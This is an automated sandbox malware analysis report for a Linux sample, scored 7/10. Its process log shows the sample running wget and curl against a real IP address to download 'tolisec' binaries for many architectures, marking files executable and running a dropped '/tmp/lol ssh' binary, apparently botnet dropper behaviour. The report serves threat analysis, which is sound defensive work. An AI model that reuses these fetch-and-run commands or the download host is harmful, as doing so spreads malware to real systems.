Malware Analysis Report

2024-10-10 10:54

Sample ID 240613-ftvm8aygjj
Target a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118
SHA256 cd9209c1c0987d201ed59bbc196a73b8f7ba47ae235dc8d7c9dde3d5b67400b9
Tags
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

cd9209c1c0987d201ed59bbc196a73b8f7ba47ae235dc8d7c9dde3d5b67400b9

Threat Level: Shows suspicious behavior

The file a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 was found to be: Shows suspicious behavior.

Malicious Activity Summary


Executes dropped EXE

Writes file to tmp directory

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-06-13 05:10

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-13 05:10

Reported

2024-06-13 05:10

Platform

debian9-mipsbe-20240418-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-13 05:10

Reported

2024-06-13 05:10

Platform

debian9-mipsel-20240226-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 05:10

Reported

2024-06-13 05:12

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

50s

Max time network

130s

Command Line

[/tmp/a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lol /tmp/lol N/A
N/A /tmp/lol /tmp/lol N/A
N/A /tmp/lol /tmp/lol N/A
N/A /tmp/lol /tmp/lol N/A
N/A /tmp/lol /tmp/lol N/A
N/A /tmp/lol /tmp/lol N/A
N/A /tmp/lol /tmp/lol N/A
N/A /tmp/lol /tmp/lol N/A
N/A /tmp/lol /tmp/lol N/A
N/A /tmp/lol /tmp/lol N/A
N/A /tmp/lol /tmp/lol N/A
N/A /tmp/lol /tmp/lol N/A
N/A /tmp/lol /tmp/lol N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lol /tmp/a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 N/A

Processes

/tmp/a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118

[/tmp/a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.x86]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.x86]

/bin/cat

[cat tolisec.x86]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-Clfupx]

/tmp/lol

[./lol ssh.x86]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.mips]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.mips]

/bin/cat

[cat tolisec.mips]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-timedated.service-Clfupx]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.mpsl]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.mpsl]

/bin/cat

[cat tolisec.mpsl]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.arm]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.arm]

/bin/cat

[cat tolisec.arm]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.arm5]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.arm5]

/bin/cat

[cat tolisec.arm5]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.arm6]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.arm6]

/bin/cat

[cat tolisec.arm6]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.arm7]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.arm7]

/bin/cat

[cat tolisec.arm7]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.ppc]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.ppc]

/bin/cat

[cat tolisec.ppc]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.m68k]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.m68k]

/bin/cat

[cat tolisec.m68k]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.spc]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.spc]

/bin/cat

[cat tolisec.spc]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.i686]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.i686]

/bin/cat

[cat tolisec.i686]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.sh4]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.sh4]

/bin/cat

[cat tolisec.sh4]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

/usr/bin/wget

[wget http://172.245.205.137/urlhausesexy/tolisec.arc]

/usr/bin/curl

[curl -O http://172.245.205.137/urlhausesexy/tolisec.arc]

/bin/cat

[cat tolisec.arc]

/bin/chmod

[chmod +x a3ed68daeda5a057e40c7ee135ed5147_JaffaCakes118 config-err-G4apKo lol netplan_iqgixu2l snap-private-tmp ssh-E1FGLiBdnlhr systemd-private-2108754713ec49b1922183a00a6f6d79-bolt.service-0hyvDH systemd-private-2108754713ec49b1922183a00a6f6d79-colord.service-yW7hdK systemd-private-2108754713ec49b1922183a00a6f6d79-ModemManager.service-sBZxmz systemd-private-2108754713ec49b1922183a00a6f6d79-systemd-resolved.service-Uc9BAY]

/tmp/lol

[./lol ssh]

Network

Country Destination Domain Proto
US 172.245.205.137:80 tcp
N/A 224.0.0.251:5353 udp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.3:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 05:10

Reported

2024-06-13 05:12

Platform

debian9-armhf-20240611-en

Max time network

27s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp
US 172.245.205.137:80 tcp

Files

N/A